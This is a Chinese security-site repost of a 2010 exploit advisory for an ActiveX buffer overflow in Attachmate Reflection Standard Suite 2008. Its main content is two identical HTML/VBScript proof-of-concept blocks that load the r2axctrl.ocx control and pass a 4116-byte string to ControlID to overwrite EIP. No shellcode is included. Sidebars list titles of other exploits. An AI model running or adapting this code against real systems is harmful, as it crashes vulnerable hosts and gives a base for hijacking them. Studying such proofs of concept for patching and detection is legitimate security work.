首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Reflection Attachmate Reflection Standard Suite 2008 ActiveX Buffer Overflow
来源:Inj3ct0r.com 作者:Sneak 发布时间:2010-05-19  
============================================================================
Reflection Attachmate Reflection Standard Suite 2008 ActiveX Buffer Overflow
============================================================================


# Exploit Title: Reflection Attachmate Reflection Standard Suite 2008 activex buffer overflow
# Date: Mar 11, 2010 found
# Software Link: http://www.attachmate.com/Evals/ruo2/eval-form.htm
# Version: 13.0 & 14.0
# Tested on: WinXP SP3 & Win7 64bit
# CVE : None yet


Attachmate Reflection Standard Suite 2008 & Reflection X Both contain a buffer overflow that could be triggered via activex. when r2axctrl.ocx is sent large string to the Reflection for UNIX & OpenVMS control class a crash happens that overwrites EIP with 41414141.


# Code : [PoC exploit below]
______________________________________________________________________________
<html>
PoC1
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:15B168B2-AD3C-11D1-A8D8-00A0C9200E61' id='target' />
<script language='vbscript'>

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\ReflectionsX\r2axctrl.ocx"
prototype  = "Property Let ControlID As String"
memberName = "ControlID"
progid     = "R2AXCTRLLib.R2winCtrl"
argCount   = 1

arg1=String(4116, "A")

target.ControlID = arg1

</script></job></package></html>

___________________________________________________________________________________
May need to throw a refresh to trigger PoC2 completely
__________________________________________________________________________________
<html>
PoC2
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:15B168B2-AD3C-11D1-A8D8-00A0C9200E61' id='target' />
<script language='vbscript'>

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\ReflectionsX\r2axctrl.ocx"
prototype  = "Property Let ControlID As String"
memberName = "ControlID"
progid     = "R2AXCTRLLib.R2winCtrl"
argCount   = 1

arg1=String(4116, "A")

target.ControlID = arg1

</script></job></package></html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·win32/xp sp3 Fr (calc.exe) She
·ChillyCMS Blind Sql Injection
·phpcms2008第二个EXP
·TeamViewer 5.0.8232 Remote BOF
·phpcms 2008 yp.php 0day exp
·NetBSD 5.0 and below Hack GENO
·Linux x86 execve("/usr/bin/wge
·NetBSD 5.0 and below Hack PATH
·ECShop <= v2.7.2 SQL injection
·ECShop <= v2.6.2 SQL injection
·支持serv-u7,8,9本地提权exp
·QtWeb Browser version 3.3 Dos
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved